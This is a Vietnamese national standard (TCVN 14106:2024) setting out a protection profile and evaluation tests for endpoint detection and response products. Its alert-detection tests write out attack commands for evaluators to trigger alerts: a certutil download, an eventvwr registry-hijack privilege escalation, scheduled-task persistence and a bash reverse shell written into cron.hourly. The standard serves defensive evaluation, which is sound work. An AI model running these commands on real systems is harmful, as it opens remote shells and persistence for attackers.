Thuộc tính
Nội dung
Tiếng Anh (English)
Văn bản gốc/PDF
Lược đồ
Liên quan hiệu lực
Liên quan nội dung
Thuộc tính
Tải về
Các bản dự thảo

Đang tải văn bản...

Tiêu chuẩn TCVN 14106:2024 về Hồ sơ bảo vệ cho sản phẩm phát hiện và phản hồi điểm cuối

Số hiệu:	TCVN14106:2024	Loại văn bản:	Tiêu chuẩn Việt Nam
Nơi ban hành:	***	Người ký:	***
Ngày ban hành:	Năm 2024	Ngày hiệu lực:
		Tình trạng:	Đã biết

5 Giới thiệu Hồ sơ bảo vệ

5.1 Tổng quan

Phạm vi của tiêu chuẩn nảy mô tả chức năng bảo mật của hệ thống phát hiện và phản hồi điểm cuối (EDR) áp dụng theo Tiêu chí chung (CC) và xác định các yêu cầu chức năng, đảm bảo cho các sản phẩm này. Hồ sơ bảo vệ này được thiết kế để sử dụng với Tiêu chuẩn quốc gia sau:

- TCVN 13468:2022 Công nghệ thông tin - Các kỹ thuật an toàn - Hồ sơ bảo vệ cho phần mềm ứng dụng (Hồ sơ bảo vệ cơ sở).

Hồ sơ bảo vệ cơ sở này được chấp nhận là hợp lệ vì EDR được triển khai dưới dạng ứng dụng phần mềm trên hệ điều hành đa năng.

5.2 Đích đánh giá tuân thủ

EDR là phần mềm giám sát hoạt động thu thập từ dữ liệu điểm cuối để phát hiện các hoạt động trái phép tiềm tàng trên các điểm cuối, cho phép phát hiện mối đe dọa và có hành động ứng phó sự cố khác để khắc phục các hành vi độc hại. Những yêu cầu này bao gồm các đặc điểm và hành vi đảm bảo an toàn cơ bản cho các sản phẩm EDR; nền tảng mà EDR chạy có thể là Hệ điều hành vật lý hoặc ảo hóa, tại chỗ hoặc trong sử dụng điện toán đám mây.

Các sản phẩm EDR dựa vào phần mềm bổ sung chạy trên điểm cuối, được gọi là Host Agent, để truyền đạt các lệnh hoặc thay đổi chính sách và nhận dữ liệu điểm cuối. Các yêu cầu an toàn cho Host Agent được giải quyết trong PP-Module [Host Agent] riêng biệt. Đánh giá hệ thống của EDR sẽ yêu cầu đánh giá các thành phần hệ thống khác nhau bao gồm EDR và [Host Agent], Mỗi đánh giá phải đáp ứng các yêu cầu trong cả EDR và Host Agent ngoài Hồ sơ bảo vệ cho phần mềm ứng dụng cơ sở. Đánh giá hệ thống EDR cần yêu cầu đánh giá các thành phần hệ thống khác nhau bao gồm một EDR và ít nhất một Host Agent. Do đó, đánh giá phải yêu cầu sự phù hợp với cấu hình Hồ sơ bảo vệ bao gồm PP-Module cho tính năng phát hiện và phản hồi điểm cuối (EDR) và PP-Module cho Host Agent. Có hai loại kiến trúc chính được giải quyết bởi các yêu cầu trong tiêu chuẩn này như hình minh hoạ dưới đây:

• Các điểm cuối kết nối thông qua Internet với EDR được tổ chức bởi đơn vị cung cấp dịch vụ đám mây (Phần mềm dưới dạng Dịch vụ).

...

Bạn phải đăng nhập hoặc đăng ký Thành Viên TVPL Pro để sử dụng được đầy đủ các tiện ích gia tăng liên quan đến nội dung TCVN.

Mọi chi tiết xin liên hệ: ĐT: (028) 3930 3279 DĐ: 0906 22 99 66

Hình 1 - Kiến trúc EDR chính

5.2.1 Phạm vi đích đánh giá

Phạm vi đích đánh giá cho EDR bao gồm tất cả các phần mềm từ đơn vị cung cấp TOE đại diện cho phía quản lý máy chủ hoặc doanh nghiệp quản lý hệ thống EDR. Trong đa số trường hợp (nhưng không phải tất cả các trường hợp) là phần mềm chạy đằng sau ứng dụng web hoặc giao diện quản trị, và có thể với các dịch vụ phần mềm khác đang chạy để gửi và nhận dữ liệu với Host Agent. EDR cũng có thể sử dụng cơ sở dữ liệu để lưu trữ dữ liệu được thu thập và phân tích. Bản thân bất kỳ phần mềm cơ sở dữ liệu nào nằm ngoài phạm vi của TOE, cũng như bất kỳ phần mềm máy chủ web nào được sử dụng để phục vụ ứng dụng web hoặc giao diện quản trị và hệ điều hành hoặc nền tảng đám mây cơ bản. Hình vẽ mô tả dưới đây cho thấy EDR (phải) giao tiếp với Host Agent (trái) qua một mạng không

Hình 2 - Các giao tiếp giữa EDR và Host Agent

5.2.2 Nền tảng đích đánh giá

Nền tảng đích đánh giá bao gồm nền tảng hệ điều hành hoặc sử dụng nền tảng điện toán đám mây mà phần mềm EDR thực thi, nằm ngoài phạm vi đánh giá. Tuy nhiên, tính an toàn của EDR phụ thuộc vào chính bản thân sản phẩm.

Bất kỳ thông tin kết nối nào có liên quan các tệp từ xa đáng tin cậy hoặc dịch vụ thông tin về mối đe dọa đều có liên quan đến an toàn hệ thống EDR tổng thể nhưng có thể nằm ngoài phạm vi đánh giá.

...

Các yêu cầu trong tiêu chuẩn này được thiết kế để giải quyết vấn đề an toàn cho các trường hợp áp dụng được nêu dưới đây. Chức năng của EDR có thể được mở rộng bởi các tiện ích bổ sung, nguồn cung cấp dữ liệu về thông tin mối đe dọa hoặc các chức năng được công bố khác. Được coi là nằm ngoài phạm vi của tiêu chuẩn này.

[TRƯỜNG HỢP ÁP DỤNG 1] Phát hiện hoạt động có khả năng trái phép

Việc phát hiện hoạt động, phần mềm hoặc người dùng có khả năng hoạt động trái phép được phát hiện bằng cách thu thập dữ liệu từ điểm cuối đến máy chủ EDR trung tâm, nơi dữ liệu được phân tích.

[TRƯỜNG HỢP ÁP DỤNG 2] Khắc phục hoạt động độc hại

Khả năng bắt đầu các lệnh khắc phục để tập trung xử lý hoạt động độc hại được phát hiện là một trường hợp áp dụng chính của EDR.

[TRƯỜNG HỢP ÁP DỤNG 3] Mở rộng

Khả năng duyệt, truy vấn và xuất dữ liệu điểm cuối dựa trên máy chủ tổng hợp một cách hiệu quả cho phép chuyên gia phân tích SOC làm rõ các tình huống sau xử lý.

6 Tuyên bố tuân thủ

Tiêu chuẩn này kế thừa tuân thủ nghiêm ngặt theo yêu cầu từ Hồ sơ bảo vệ cơ sở được chỉ định như được định nghĩa trong tài liệu Phụ lục cc và CEM về tuân thủ nghiêm ngặt, các SFR dựa trên lựa chọn và các SFR tùy chọn, xuất bản tháng 5 năm 2017 - (CC and CEM addenda for Exact Conformance, Selection-Based SFRs, and Optional SFRs).

...

Vấn đề an toàn được mô tả là các mối đe dọa mà EDR dự kiến sẽ giải quyết, giả định về OE và bất kỳ chính sách đảm bảo an toàn tổng hợp nào mà EDR dự kiến sẽ thực thi. Có thể mở rộng tới bất kỳ mối đe dọa, giả định và chính sách đảm bảo an toàn tập trung nào được xác định bởi Hồ sơ bảo vệ cơ sở.

7.1 Các mối đe dọa

7.1.1 T.MISCONFIGU RATION

Đối tượng tấn công là người dùng đặc quyền hợp pháp có quyền truy cập để thay đổi cấu hình khả năng đảm bảo an toàn của EDR hoặc không phải là người quản trị hợp pháp cố gắng truy cập mà không có sự cho phép thích hợp. Đối tượng tấn công có thể thực hiện ẩn các hoạt động độc hại khỏi những người dùng quản trị khác.

7.1.2 T.CREDENTIAL_REUSE

Đối tượng tấn công được xác định trên một kênh liên lạc hoặc bất kỳ đâu trên cơ sở hạ tầng mạng. Đối tượng tấn công có thể đoán hoặc thu thập thông tin đăng nhập hợp pháp từ EDR, điểm cuối hoặc hoạt động mạng không an toàn.

7.2 Các giả định

Các giả định được đưa ra trong môi trường hoạt động để đảm bảo rằng chức năng an toàn của TOE có thể đáp ứng theo yêu cầu chỉ định trong tiêu chuẩn. Nếu TOE được đặt trong môi trường hoạt động không đáp ứng các giả định này, TOE có thể mất khả năng cung cấp tất cả các chức năng an toàn được thiết kế.

KẾT NỐI (A.CONNECTIVITY)

...

7.3 Chính sách tổ chức đảm bảo an toàn

Tiêu chuẩn này không bổ sung chính sách tổ chức đảm bảo an toàn ngoài các chính sách đã được xác định trong Hồ sơ bảo vệ cơ sở.

8 Các mục tiêu an toàn

8.1 Mục tiêu an toàn cho TOE

8.1.1 O.ACCOUNTABILITY

TOE phải cung cấp các cơ sở ghi nhật ký ghi lại các hoạt động quản trị được thực hiện bởi người quản trị bằng cách định danh và xác thực.

Xác định bởi: FAU_GEN.1/EDR, FIA_AUT_EXT.1

8.1.2 O.EDRMANAGEMENT

TOE phải đảm bảo sự thuận tiện đối với hoạt động quản trị được cấp quyền của doanh nghiệp, cung cấp các giao diện nhất quán và được hỗ trợ cấu hình, mục đích và hoạt động liên quan đến an toàn của doanh nghiệp.

...

8.1.3 O.PROTECTED_TRANSIT

Để giải quyết cả các mối đe dọa tấn công mạng thụ động (nghe lén) và chủ động (hoạt động sửa đổi gói tin), TOE phải sử dụng kênh đáng tin cậy phù hợp để bảo vệ tất cả các thông tin liên lạc. Dữ liệu nhạy cảm bao gồm khóa mật mã, mật khẩu và bất kỳ dữ liệu nào khác dành riêng cho ứng dụng không bị lộ bên ngoài ứng dụng hoặc cho người dùng chưa được xác thực.

Xác định bởi: FCS_DTLSS_EXT.1 (từ gói TLS), FCS_DTLSC_EXT,1 (từ gói TLS), FCS_HTTPS_EXT.1 (từ Base-PP), FCS_TLSC_EXT. 1 (từ TLS Package), FCS_TLSC_EXT.2 (từ gói TLS), FCS_TLSS_EXT.1 (từ gói TLS), FCS_TLSS_EXT.2 (từ gói TLS), FPTJTT.1, FTP_TRP.1

8.2 Các mục tiêu an toàn đối với môi trường hoạt động

Môi trường hoạt động của TOE thực hiện các biện pháp kỹ thuật và quy trình để hỗ trợ TOE cung cấp chính xác chức năng an toàn (được xác định bởi các đích an toàn cho TOE). Các mục tiêu an toàn của môi trường hoạt động bao gồm một tập hợp các yếu tố mô tả các mục tiêu mà môi trường hoạt động cần đạt được. Phần này xác định các đích an toàn sẽ được giải quyết bởi biện pháp kỹ thuật hoặc bằng các phương pháp phi kỹ thuật hoặc quy trình. Các giả định được xác định trong điều 7 được kết hợp như các mục tiêu an toàn đối với môi trường hoạt động. Các mục tiêu an toàn của môi trường hoạt động hỗ trợ EDR cung cấp chính xác chức năng an toàn. Các mục tiêu này đồng bộ với các giả định về môi trường hoạt động.

OE.RELIABLE_TRANSIT

Kết nối truyền dữ liệu giữa EDR và các Host Agent (có dây hoặc không dây) sử dụng kết nối thích hợp đáng tin cậy.

8.3 Cơ sở cho các mục tiêu an toàn

Phần này mô tả cách các giả định, mối đe dọa và chính sách đảm bảo an toàn của tổ chức ánh xạ đến các mục tiêu an toàn.

...

Mối nguy, Giả định

Đối tượng an toàn

Cơ sở

T.MISCONFIGURATION (Cấu hình sai)

O.EDR MANAGEMENT (Quản lý EDR)

Mối đe dọa T.MISCONFIGURATION được kiểm soát bằng O.EDR MANAGEMENT vì đối tượng này dựa trên khả năng quản lý được phân quyền đối với các hoạt động quản trị.

O.ACCOUNTABILITY (Trách nhiệm giải trình)

Mối đe dọa T.MISCONFIGURATION được kiểm soát bằng O.ACCOUNTABILITY vì đối tượng này dựa trên danh tính, xác thực và kiểm tra các hoạt động quản trị.

T.CREDENTIAL REUSE

...

O.PROTECTED TRANSIT

(Bảo vệ truyền tải)

Mối đe dọa T.CREDENTIAL REUSE được kiểm soát bằng O.PROTECTED TRANSIT vì đối tượng này dựa trên tính an toàn của dữ liệu được truyền.

O.PROTECTED_STORAGE

Mối đe dọa T.CREDENTIAL REUSE được kiểm soát bằng O.PROTECTED_STORAGE vì đối tượng này dựa trên tính an toàn của thông tin đăng nhập được lưu trữ cục bộ.

A. CONNECTIVITY

(Kết nối)

OE.RELIABLE TRANSIT

(Truyền tải tin cậy)

...

9 Các yêu cầu an toàn

Phần này mô tả các yêu cầu an toàn phải được thực hiện bởi sản phẩm đang được đánh giá. Những yêu cầu đỏ bao gồm các thành phần chức năng từ TCVN 8709-2:2011 và các thành phần đảm bảo từ TCVN 8709-3:2011. Các quy ước sau đây được sử dụng để hoàn thành các hoạt động:

• Chỉ định: được trình bày dưới dạng văn bản in nghiêng;

• Tinh chỉnh: được trình bày đằng sau từ "Tinh chỉnh" và được bôi đậm;

• Lựa chọn: được trình bày dưới dạng văn bản gạch dưới;

• Chỉ định trong một lựa chọn: được trình bày dưới dạng văn bản in nghiêng và gạch chân:

• Lặp lại: Chỉ định bằng cách thêm các SFR hoặc thành phần tên với một dấu gạch chéo và chỉ báo duy nhất, ví dụ "/EXAMPLE1".

9.1 Hướng dẫn yêu cầu chức năng an toàn của Hồ sơ bảo vệ cho phần mềm ứng dụng

Trong một cấu hình Hồ sơ bảo vệ bao gồm cả Hồ sơ bảo vệ cho phần mềm ứng dụng (TCVN 13468:2022), TOE dự kiến phải dựa vào một số chức năng an toàn được thực hiện bởi toàn bộ ứng dụng và được đánh giá dựa trên Hồ sơ bảo vệ cơ sở. Các SFR được liệt kê trong phần này được định nghĩa trong Hồ sơ bảo vệ cơ sở và có liên quan đến hoạt động an toàn của EDR. Phần này mô tả những sửa đổi mà người đánh giá phải thực hiện đối với SFR của Hồ sơ bảo vệ cơ sở để đáp ứng các chức năng cần thiết của EDR.

...

Tiêu chuẩn này không sửa đổi bất kỳ SFR nào được xác định bởi TCVN 13468:2022 Hồ sơ bảo vệ cho phần mềm ứng dụng.

9.2 Các yêu cầu chức năng an toàn TOE

Phần sau đây mô tả các SFR phải đáp ứng được bởi bất kỳ TOE nào tuyên bố phù hợp với Tiêu chuẩn này. Các SFR phải yêu cầu bất kể cấu hình Hồ sơ bảo vệ nào được sử dụng để xác định TOE.

9.2.1 FAU: Kiểm toán an toàn (FAU)

9.2.1.1 FAU_ALT_EXT.1 Các cảnh báo máy chủ

FAU_AL_TEXT.1.1

EDR phải cảnh báo người dùng được ủy quyền trên hệ thống quản trị trong trường hợp ghi nhận bất kỳ hoạt động nào sau đây:

a. Thay đổi trạng thái đăng ký Host Agent;

b. Phát hiện hoạt động có khả năng trái phép trên các điểm cuối đã đăng ký.

...

FAU_ALT_EXT.1.2

EDR phải cung cấp một thông tin trực quan về việc cảnh báo các sự cố trái phép có khả năng xảy ra và phải bao gồm:

a. Mức độ nghiêm trọng của sự cố ban đầu và [lựa chọn: đánh giá, phân loại, điểm số, xếp hạng].

b. Trình tự thời gian của sự cố.

Lưu ý áp dụng: Mục đích của yêu cầu này là chỉ rõ tập hợp tối thiểu các sự cố được trực quan hóa mà EDR phải có khả năng thể hiện cho người dùng được cấp quyền. Trực quan hóa được định nghĩa rộng rãi là việc hiển thị dữ liệu sự cố cho người dùng được cấp quyền trên giao diện quản trị. Hình ảnh trực quan không bắt buộc phải có khả năng tương tác.

FAU_ALT_EXT.1.3

EDR phải cung cấp khả năng xuất dữ liệu cho các cảnh báo được chọn với định dạng dựa trên tiêu chuẩn được chỉ định của [lựa chọn:

- Biểu diễn thông tin về mối đe dọa có cấu trúc - structured Threat Information expression (STIX),

- Biểu thức điện tử quan sát trên không gian mang - Cyber Observable expression (CybOX),

...

- Định dạng sự kiện chung - Common Event Format (CEF),

- Định dạng mở rộng nhất ký sự kiện - Log Event Extended Format (LEEF)

Lưu ý áp dụng: Mục đích của yêu cầu này là chỉ định lựa chọn các định dạng dựa trên tiêu chuẩn mà EDR phải cung cấp đề xuất các cảnh báo đã chọn, ít nhất một định dạng phải được chọn.

Hoạt động đánh giá:

TSS

Người đánh giá phải kiểm tra TSS để đảm bảo rằng TSS mô tả cách các cảnh báo về những thay đổi trạng thái đăng ký máy chủ trung gian và các hoạt động có khả năng trái phép trên các điểm cuối đã đăng ký được phát hiện và hiển thị.

Người đánh giá phải kiểm tra TSS để đảm bảo TSS chứa danh sách các loại hoạt động trái phép được EDR phân loại hoặc dán nhãn khi bị phát hiện.

Người đánh giá phải kiểm tra TSS để xác định TSS mô tả cách hiển thị trực quan hóa cảnh báo và nội dung nào được sử dụng.

...

Hướng dẫn

Người đánh giá phải xem xét hướng dẫn hoạt động để xác định TSS chứa tài liệu về việc đăng ký và hủy kiểm soát máy chủ trung gian từ EDR.

Người đánh giá phải xem xét hướng dẫn hoạt động để xác định danh sách các loại hoạt động trái phép được EDR phân loại hoặc gắn nhãn khi phát hiện.

Người đánh giá phải đảm bảo hướng dẫn bao gồm bất kỳ thông tin cấu hình cần thiết nào để hiển thị cảnh báo liên quan đến những thay đổi trong trạng thái máy chủ đã đăng ký và các hoạt động có khả năng trái phép.

Người đánh giá phải xem xét hướng dẫn hoạt động để xác định TSS chứa tài liệu về việc sử dụng giao diện quản trị để trực quan hóa và xem cảnh báo.

Người đánh giá phải xem xét hướng dẫn hợp lý để xác định TSS chứa tài liệu về các sản phẩm được hỗ trợ đề xuất cảnh báo ở các định dạng dựa trên tiêu chuẩn.

Đánh giá

Người đánh giá thực hiện các bài kiểm tra sau:

Người đánh giá phải tuân theo hướng dẫn để hủy kiểm tra Host Agent từ EDR và xác minh rằng hành động hủy đăng ký đã được ghi lại trong nhật ký hoạt động có thể kiểm toán và được đánh dấu thời gian.

...

Đối với Windows, người đánh giá phải kiểm tra khả năng phát hiện hoạt động bất thường của EDR bằng cách thực hiện các bài kiểm tra phụ dựa trên nền tảng của hệ thống Host Agent đã đăng ký, xác minh cho từng cảnh báo tương ứng được tạo trong giao diện quản trị:

Thử nghiệm 1: Người đánh giá phải mở dấu nhắc lệnh Windows với vai trò là người dùng và chạy lệnh cmd /c certutil - urlcache - split - f <tệp tin điều khiển> < thư mục tải>, trong đó tệp từ xa là đường dẫn tệp hợp lệ đến tệp thực thi có thể truy cập, được lưu trữ từ xa và thư mục tải xuống là một đường dẫn thư mục hợp lệ được ghi bởi người dùng hiện tại.

Thử nghiệm 2: Người đánh giá phải mở dấu nhắc lệnh Windows với vai trò là người dùng và chạy lệnh reg.exe add hkcu\software\classes\msc tệp tin\shell\open\command /ve /d "<thực thi cục bộ>" /f, trong đó tệp thực thi cục bộ là đường dẫn tệp hợp lệ đến tệp thực thi cục bộ, có thể đọc được. Thực hiện đánh giá hoặc chạy lệnh cmd.exe /c eventvwr.msc trong cùng một cửa sổ dấu nhắc lệnh sau đó.

Thử nghiệm 3: Người đánh giá phải mở dấu nhắc lệnh Windows với vai trò là người dùng và chạy lệnh SCHTASKS /Create /sc ONCE/TN spawn /TR <có thể định vị>" /ST <thời gian>, trong đó tệp thực thi cục bộ là đường dẫn tệp hợp lệ đến tệp có thể đọc được, thực thi cục bộ và thời gian là thời gian bắt đầu xảy ra trong khoảng thời gian kể từ khi tác vụ được tạo.

Đối với Linux, Người đánh giá phải Kiểm tra khả năng phát hiện hoạt động bất thường của EDR bằng cách thực hiện các kiểm tra phụ theo dõi dựa trên nền tảng của hệ thống Máy chủ trung gian đã đăng ký, xác minh cho từng cảnh báo tương ứng được tạo trong giao diện quản trị:

Thử nghiệm 1: Người đánh giá phải mở một thiết bị điểm cuối và chạy lệnh scp<remote user>@<host điều khiển>: <đường dẫn điều khiển> <thư mục tải>, trong đó người dùng từ xa là người dùng hợp lệ trên máy chủ từ xa; đường dẫn từ xa là một đường dẫn hợp lệ cho một tệp thực thi được lưu trữ từ xa và thư mục tải xuống là một đường dẫn thư mục hợp lệ được ghi bởi người dùng cục bộ hiện tại. Mật khẩu của user từ xa sẽ được cung cấp khi được nhắc.

Thử nghiệm 2: Người đánh giá phải mở một thiết bị điểm cuối và chạy lặp lại lệnh "bash -i >& /dev/tcp/<IP ngoài>/5050 0>&1 1 &" > /etc/cron.hourly/persist, trong đó IP bên ngoài là một địa chỉ bên ngoài hợp lệ.

Đối với tất cả các nền tảng:

Thử nghiệm 1: Người đánh giá phải xem xét cảnh báo trên giao diện quản trị và xác minh rằng cảnh báo có chứa trường mức độ nghiêm trọng và các trường được chỉ định trong ST. Người đánh giá phải mở hoặc xem cảnh báo và xác minh rằng dòng thời gian của các sự kiện có sẵn để xem xét. Dòng thời gian sẽ hiển thị sự tiến triển của các sự kiện theo thời gian.

...

9.2.1.2 FAU_COL_EXT.1 Dữ liệu điểm cuối được thu thập

FAU_COL_EXT.1.1

EDR phải thu thập bộ dữ liệu điểm cuối sau đây từ Host Agent:

a. Phiên bản Hệ điều hành, kiến trúc và Địa chỉ IP,

b. Hoạt động đăng nhập tài khoản tại thiết bị điểm cuối đặc quyền và không có đặc quyền;

c. Tạo tiến trình,

d. Thư viện và cấu trúc được tải bởi các tiến trình,

e. Tên tệp và [chỉ định: metadata khác] của các tệp được tạo và [chỉ định: các hoạt động khác được thực hiện với các tệp] được lưu trữ liên tục.

f. [chỉ định: Dữ liệu máy chủ khác].

...

Hoạt động đánh giá:

TSS

Người đánh giá phải xác minh tất cả các loại dữ liệu sự kiện điểm cuối hỗ trợ được mô tả.

Hướng dẫn

Người đánh giá phải xem xét hướng dẫn hoạt động và xác định TSS liệt kê tất cả các loại dữ liệu sự kiện điểm cuối có thể thu thập được.

Đánh giá

Người đánh giá thực hiện các bài kiểm tra sau:

Thử nghiệm 1: Người đánh giá phải xác minh phiên bản hệ điều hành, kiến trúc và địa chỉ IP của hệ thống do máy chủ trung gian quản lý so với dữ liệu được báo cáo cho EDR.

Thử nghiệm 2: Người đánh giá phải đăng nhập vào một hệ thống được quản lý bởi máy chủ trung gian với hai tài khoản riêng biệt và xác minh rằng hoạt động được báo cáo chính xác cho EDR.

...

Thử nghiệm 4: Người đánh giá phải khởi tạo một tài liệu rỗng mới trong kho lưu trữ liên tục và xác minh rằng hoạt động được báo cáo chính xác cho EDR.

Thử nghiệm 5: Người đánh giá phải thực hiện một hành động gây ra một sự kiện xảy ra cho tất cả các mục trong nhiệm vụ và xác minh hoạt động được báo cáo cho EDR.

9.2.1.3 FAU_GEN.1/EDR Tạo dữ liệu kiểm tra

FAU_GEN.1.1/EDR

Tinh chỉnh: EDR phải tạo hồ sơ kiểm toán về các sự kiện có thể kiểm toán sau:

a. Tất cả các sự kiện có thể kiểm toán cho [mức độ không được chỉ định] và

[

a. Hoạt động đăng nhập giao diện quản trị EDR;

b. Lệnh khắc phục được gửi đến Host Agent, điểm cuối hoặc hệ thống thiết bị mạng bị ảnh hưởng;

...

d. [chỉ định: Các sự kiện có thể kiểm toán khác]

Lưu ý áp dụng: Mục đích của yêu cầu này là chỉ định tập hợp tối thiểu các bản ghi Thử nghiệm được tạo ra về các hành động trên EDR.

FAU_GEN.1.2/EDR

Tinh chỉnh: EDR phải ghi lại trong mỗi hồ sơ kiểm toán ít nhất là các thông tin sau:

a. Ngày và giờ diễn ra sự kiện,

b. Loại sự kiện,

c. Danh tính đối tượng,

d. Kết quả (thành công hay thất bại) của sự kiện,

...

Lưu ý áp dụng: Yêu cầu này phác thảo thông tin điện tử sẽ được đưa vào hồ sơ kiểm toán. Tất cả các cuộc kiểm toán phải chứa ít nhất thông tin được đề cập trong FAU_GEN.1.2 / EDR, nhưng có thể chứa nhiều thông tin hơn có thể được chỉ định.

Hoạt động đánh giá:

TSS

Người đánh giá phải kiểm tra để xác định TSS liệt kê tất cả các sự kiện có thể kiểm toán được yêu cầu trong SFR. Người đánh giá phải kiểm tra để đảm bảo rằng mọi loại sự kiện kiểm toán do SFR chỉ định đều được mô tả trong TSS.

Người đánh giá phải kiểm tra để xác định TSS cung cấp một định dạng cho hồ sơ kiểm toán. Mỗi loại định dạng chuỗi kiểm toán phải được bao quát cùng với mô tả ngắn gọn về từng trường.

Hướng dẫn

Người đánh giá phải kiểm tra hướng dẫn vận hành và xác định TSS liệt kê tất cả các sự kiện có thể kiểm toán được yêu cầu trong SFR. Người đánh giá phải kiểm tra để đảm bảo rằng mọi loại sự kiện kiểm toán do SFR bắt buộc đều được mô tả.

Người đánh giá phải kiểm tra hướng dẫn vận hành và xác định các lệnh nào có liên quan đến cấu hình (bao gồm cho phép hoặc vô hiệu hóa) các cơ chế được thực hiện trong EDR cần thiết để thực thi các yêu cầu được chỉ định trong tiêu chuẩn này. Người đánh giá phải ghi lại phương pháp hoặc cách tiếp cận được thực hiện trong khi xác định hành động nào trong hướng dẫn vận hành có liên quan đến an toàn liên quan đến tiêu chuẩn này. Người đánh giá có thể thực hiện hoạt động này như một phần của các hoạt động liên quan đến việc đảm bảo AGD_OPE hướng dẫn đáp ứng các yêu cầu.

Người đánh giá phải kiểm tra hướng dẫn vận hành và xác định TSS cung cấp một định dạng cho hồ sơ kiểm toán. Mỗi loại định dạng bản ghi kiểm toán phải được bảo hiểm, cùng với một mô tả ngắn gọn về từng trường. Người đánh giá phải kiểm tra để đảm bảo rằng mô tả của các trường chứa thông tin cần thiết trong FAU_GEN. 1.2 / EDR.

...

Người đánh giá phải thực hiện các thử nghiệm sau:

Thử nghiệm 1: Người đánh giá phải đăng nhập vào giao diện quản trị EDR và xác minh rằng dữ liệu nhật ký kiểm tra mô tả các hoạt động được ghi lại.

Thử nghiệm 2: Người đánh giá phải đưa ra lệnh khắc phục hợp lệ do EDR cung cấp cho Host Agent, lần thứ hai xác minh rằng dữ liệu nhật ký kiểm tra mô tả hoạt động được ghi lại trên giao diện quản trị EDR.

Thử nghiệm 3: Người đánh giá phải thay đổi tùy chọn cấu hình EDR không phá hoại trong giao diện quản trị EDR, thay đổi nó trở lại cài đặt ban đầu và xác minh rằng dữ liệu nhật ký đánh giá mô tả hoạt động được ghi lại.

Thử nghiệm 4: Người đánh giá phải thực hiện hành động để tạo ra tất cả các sự kiện có thể đánh giá khác được liệt kê trong nhiệm vụ và xác minh hoạt động được ghi lại. Khi xác minh kết quả kiểm tra từ FAU_GEN. 1.1 / EDR, người đánh giá phải đảm bảo hồ sơ kiểm toán được tạo trong quá trình thử nghiệm khớp với định dạng được chỉ định trong hướng dẫn quản trị và các trường trong mỗi hồ sơ kiểm toán có mục nhập thích hợp.

Lưu ý: Việc thử nghiệm ở đây có thể được thực hiện cùng với việc Kiểm tra trực tiếp các cơ chế đảm bảo an toàn. Ví dụ: thử nghiệm được thực hiện để đảm bảo rằng hướng dẫn vận hành được cung cấp là chính xác, xác minh rằng AGD_OPE.1 được thoả mãn và thực hiện các hành động quản trị cần thiết để xác minh hồ sơ kiểm toán được khởi tạo.

9.2.2 FIA: Định danh và xác thực

9.2.2.1 FIA AUT EXT.1 Cơ chế xác thực giao diện quản trị

EDR phải [lựa chọn: tận dụng nền tảng để xác thực: cung cấp xác thực dựa trên tên người dùng/mật khẩu và [lựa chọn: xác thực bằng thẻ thông minh bên ngoài và mà PIN: không thêm yếu tố khác]]

...

Lưu ý áp dụng: Lựa chọn chỉ định nếu thẻ thông minh cũng được hỗ trợ, thì phải có lựa chọn bổ sung.

Hoạt động đánh giá:

TSS

Người đánh giá phải Kiểm tra xác định TSS mô tả cách xác thực người dùng được thực hiện. Người đánh giá phải xác minh rằng các phương pháp ủy quyền được liệt kê trong TSS được chỉ định và bao gồm trong các yêu cầu trong ST.

Hướng dẫn

Người đánh giá phải xem xét hướng dẫn hoạt động để xác định TSS chứa tài liệu về việc định cấu hình bất kỳ cơ chế xác thực được hỗ trợ nào và bất kỳ hỗ trợ nào cho xác thực đa yếu tố.

Đánh giá

Thử nghiệm 1: Điều kiện: Nếu "cung cấp các cơ chế xác thực qua tài khoản và mật khẩu" được chọn, người đánh giá phải tạo tài khoản có tên người dùng và mật khẩu, xác minh rằng xác thực đăng nhập có phân biệt chữ hoa chữ thường. Nếu các yếu tố bổ sung được đảm bảo, mỗi một nhân tố sẽ được Kiểm tra để truy cập đăng nhập với xác thực đồng nhất nghiêm ngặt cho những người được kích hoạt. Người đánh giá phải xác minh rằng quyền truy cập đăng nhập được cấp cho thông tin đăng nhập là chính xác và bị từ chối trong trường hợp thông tin đăng nhập không chính xác trên các yếu tố có sẵn.

Thử nghiệm 2: Điều kiện: Nếu "tận dụng nền tảng" được chọn, người đánh giá phải tạo một tài khoản theo các quy tắc nền tảng. Nếu các yếu tố bổ sung được cung cấp, mỗi yếu tố sẽ được Kiểm tra quyền truy cập đăng nhập với xác thực nhất trí nghiêm ngặt cho những người được kích hoạt. Người đánh giá phải xác minh rằng quyền truy cập đăng nhập được cấp cho thông tin đăng nhập chính xác và bị từ chối trong trường hợp thông tin đăng nhập không chính xác trên các yếu tố có sẵn.

...

FIA_PWD_EXT.1.1

EDR phải hỗ trợ các yếu tố xác thực mật khẩu sau:

Mật khẩu phải bao gồm bất kỳ tổ hợp nào của [lựa chọn: chữ hoa và chữ thường, [chỉ định: một bộ ký tự ít nhất 52 ký tự]]. số và ký tự đặc biệt: [lựa chọn: "!", "@", "#", "$" "%", "^", "&", "*", "(", ")", [chỉ định: các dữ liệu khác]], độ dài mật khẩu lên đến [chỉ định: một số nguyên lớn hơn hoặc bằng 64] ký tự sẽ được hỗ trợ.

Lưu ý áp dụng: Đơn vị cung cấp TOE chọn bộ ký tự: chữ hoa và chữ thường Chữ Latinh cơ bản hoặc một bộ ký tự được chỉ định khác chứa ít nhất 52 ký tự. Bộ ký tự được chỉ định phải được xác định rõ: theo tiêu chuẩn mã hóa quốc tế (chẳng hạn như Unicode) hoặc được xác định trong sự chỉ định của người đánh giá. Đơn vị cung cấp TOE cũng chọn các ký tự đặc biệt được TOE hỗ trợ; có thể tùy chọn liệt kê các ký tự đặc biệt bổ sung được hỗ trợ bằng cách sử dụng thử nghiệm.

Hoạt động đánh giá:

TSS

Người đánh giá phải xác minh TSS bao gồm tất cả các ký tự, quy tắc và giới hạn được hỗ trợ được sử dụng bởi EDR và đáp ứng các yêu cầu của SFR.

Hướng dẫn

Người đánh giá phải xem xét hướng dẫn hoạt động để xác định TSS chứa tài liệu về chính sách mật khẩu mặc định.

...

Người đánh giá thực hiện các bài kiểm tra sau:

Thử nghiệm 1: Người đánh giá phải xác minh rằng mật khẩu có tối đa 64 ký tự được hỗ trợ.

Thử nghiệm 2: Người đánh giá phải xác minh rằng các quy tắc thành phần mật khẩu có trong hướng dẫn hoạt động được thực thi. Mặc dù người đánh giá không bắt buộc để Kiểm tra tất cả các quy tắc thành phần có thể, người đánh giá phải đảm bảo rằng tất cả các ký tự được hỗ trợ và các đặc điểm quy luật được liệt kê trong yêu cầu được thực thi.

9.2.3 Quản lý an toàn (FMT)

